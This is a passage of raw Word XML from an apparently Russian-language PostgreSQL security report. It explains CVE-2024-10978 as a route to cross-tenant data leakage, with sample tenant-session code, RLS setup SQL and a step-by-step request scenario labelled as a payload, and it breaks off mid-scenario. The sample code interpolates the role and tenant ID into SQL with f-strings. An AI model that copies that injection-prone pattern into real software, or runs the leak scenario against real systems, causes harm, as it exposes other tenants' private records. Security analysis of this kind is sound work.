        <w:t xml:space="preserve"> — общий контекст 2023 CVE fix (одна из 2023 batch вместе с R12 CVE-2023-2454).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на critical tables как defence-in-depth.</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CVE-2023-39418 — https://www.postgresql.org/support/security/CVE-2023-39418/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15.4 Release Notes — https://www.postgresql.org/docs/release/15.4/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NIST NVD: CVE-2023-39418 — https://nvd.nist.gov/vuln/detail/CVE-2023-39418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«MERGE» — https://www.postgresql.org/docs/current/sql-merge.html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«Row Security Policies» — https://www.postgresql.org/docs/current/ddl-rowsecurity.html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pganalyze blog: «PostgreSQL 15.4 security fixes» — https://pganalyze.com/blog/5mins-postgres-15-4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R11 (sources/research.md, строки 194–207)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.17.3 SET ROLE reset (R8, CVE-2024-10978)</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Тот же CVE-2024-10978, что описан в 3.13.1, но рассматривается под другим углом — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">как vector data exfiltration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, а не privilege escalation. В 3.13.1 фокус: атакующий «попадает в чужую роль» и получает её привилегии. В 3.17.3 фокус: атакующий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">читает чужие RLS-protected rows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, потому что plan-cached query применяет RLS policy неверной роли.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Граница между 3.13.1 и 3.17.3 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">семантическая, не техническая</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: один и тот же баг, два разных attack-outcome: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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: «execute как чужая роль» → privilege escalation (можно создать superuser, выдать гранты и т. д.).</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3.17.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: «прочитать как чужая роль» → data leak (видны строки RLS-protected таблиц других tenant).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В этом подразделе акцент на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">второй паттерн</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + cross-ref на 3.13.1 за detailed CVE-блок и общий механизм.</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app/db/session.py — multi-tenant connection-pool с SET ROLE per-request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">from contextlib import asynccontextmanager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@asynccontextmanager</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def tenant_session(tenant_role: str, tenant_id: int):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """Connection с SET ROLE для конкретного tenant"""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    async with async_session_factory() as session:</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session.execute(text(f"SET ROLE {tenant_role}"))</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session.execute(text(f"SET app.tenant_id = '{tenant_id}'"))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            yield session</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        finally:</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session.execute(text("RESET ROLE"))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            await session.execute(text("RESET app.tenant_id"))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># app/api/v1/billing.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">@router.get("/invoices/recent")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def get_recent_invoices(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    tenant_role: str = Depends(get_tenant_role_from_jwt),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    tenant_id: int = Depends(get_tenant_id_from_jwt),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async with tenant_session(tenant_role, tenant_id) as session:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        # Стандартный SELECT с RLS-фильтрацией</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session.execute(text("""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            SELECT id, amount, paid_at, description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            FROM billing.invoices</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            WHERE paid_at &gt; now() - interval '30 days'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            ORDER BY paid_at DESC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            LIMIT 50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[dict(r._mapping) for r in result]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Setup БД (как в 3.17.1):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER TABLE billing.invoices ENABLE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CREATE POLICY tenant_invoices ON billing.invoices</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    USING (tenant_id = current_setting('app.tenant_id')::int);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Роль application_user — общая, через SET ROLE переключается в tenant_X:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE ROLE application_user LOGIN PASSWORD '...';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE ROLE tenant_42 NOINHERIT;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE ROLE tenant_99 NOINHERIT;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT tenant_42 TO application_user;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT tenant_99 TO application_user;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT SELECT ON billing.invoices TO tenant_42, tenant_99;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Connection pool reuses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">application_user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> connection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET ROLE tenant_X</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> переключает effective role per-request. CVE-2024-10978 — баг в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">reset path этого переключения</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Payload — cross-tenant invoice exfiltration</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 атакующий-tenant 42 делает первый запрос:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /invoices/recent (JWT tenant_42)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Connection C: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET ROLE tenant_42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app.tenant_id = '42'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. PostgreSQL планирует и кэширует SELECT с RLS-фильтром для tenant_42. Response: 50 invoices tenant 42.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RESET ROLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — connection возвращается в pool.</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 другой пользователь-tenant 99 делает запрос:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /invoices/recent (JWT tenant_99)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Connection pool выдаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">тот же connection C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (или другой). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
